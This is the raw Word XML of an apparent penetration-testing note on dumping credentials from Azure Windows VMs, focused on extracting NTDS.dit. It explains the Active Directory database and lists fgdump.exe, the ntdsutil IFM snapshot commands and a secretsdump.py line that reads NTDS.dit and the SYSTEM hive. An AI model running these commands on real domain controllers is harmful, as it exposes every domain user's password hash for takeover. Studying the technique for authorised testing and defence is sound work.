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4AF0C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="30EC58F8" w14:textId="1506F394" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc221397416"/>
      <w:r>
        <w:t xml:space="preserve">Credential dumping </w:t>
      </w:r>
      <w:r>
        <w:t>with NTDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="761DF45D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="76347E8E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, detailed, and de-duplicated summary</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> of how to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> Azure Windows/Linux VMs focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>credential dumping from local accounts, AD accounts, and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">, with emphasis on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> extraction and related attacks on Windows VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E807A5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="0716E267">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A1ABD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Azure VM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Credential Dumping from Local, AD &amp; Microsoft Entra ID Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D607750" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE09D0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Credential dumping is a core step in post-exploitation to extract password hashes or plaintext credentials from compromised VMs. In Azure, this involves attacking </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local Windows accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> (stored in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> on Domain Controllers), and </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Entra ID (Azure AD)</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> tokens or credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B2A8E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="13F83029">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C7A0E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 1: Credential Dumping on Windows VMs (Local &amp; AD Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31633737" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A0170" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> is the Active Directory database file located by default at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025F1F7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>C:\Windows\NTDS\NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0671F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>It stores all domain data, including password hashes, user objects, groups, and other AD information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240FAA8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Size ranges from ~12MB to multiple terabytes depending on AD scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCFC89" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> logically contains partitions like Schema, Configuration, Domain, and Application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D0F733" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why Target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA83ACA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Extracting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> allows dumping all domain user password hashes (including high privilege accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE43A5C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Critical for lateral movement and privilege escalation in domain environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9FD99B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="335C44DA">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BBE4A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Steps to Dump </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FF274" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access to VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB51041" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Obtain an initial foothold with local admin or SYSTEM privileges on the Windows VM (via RDP, exploit, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D455C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>On Azure Linux VMs, typical Windows domain attacks don’t apply directly; focus on local accounts or Azure AD tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AB9A8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identify if VM is a Domain Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D136B3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Run on Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C549C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>dsgetdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>domain_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6A783" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Check if C:\Windows\NTDS\NTDS.dit exists (only on Domain Controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484500F7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and SYSTEM Hive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42DC4C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Password hashes inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> are encrypted with keys stored in SYSTEM hive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A1DEA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Common dump tools require both </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> and SYSTEM registry hive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A465E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Dumping Tools &amp; Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA4C01" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FGDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2A39F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Legacy tool for dumping local and domain hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BDBC3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA88E0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:lastRenderedPageBreak/>
        <w:t>fgdump.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1ECB0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Dumps local and domain hashes into .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>pwdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A20AAE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDSUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (native Microsoft tool):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780A0E3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Used to create snapshots or exports of the Active Directory database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8D8B0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Commands run in elevated prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DC8EE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntdsutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E622900" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">activate instance </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46CBDD56" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ifm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15F6FB4B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>create full &lt;path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1337ED" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Can be used to extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> copy without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55441B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SecretsDump.py (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6522A4CF" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Python tool to extract hashes remotely or locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1993B4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Local usage example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59445FEB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>secretsdump.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> C:\Windows\NTDS\NTDS.dit -system C:\Windows\System32\config\SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
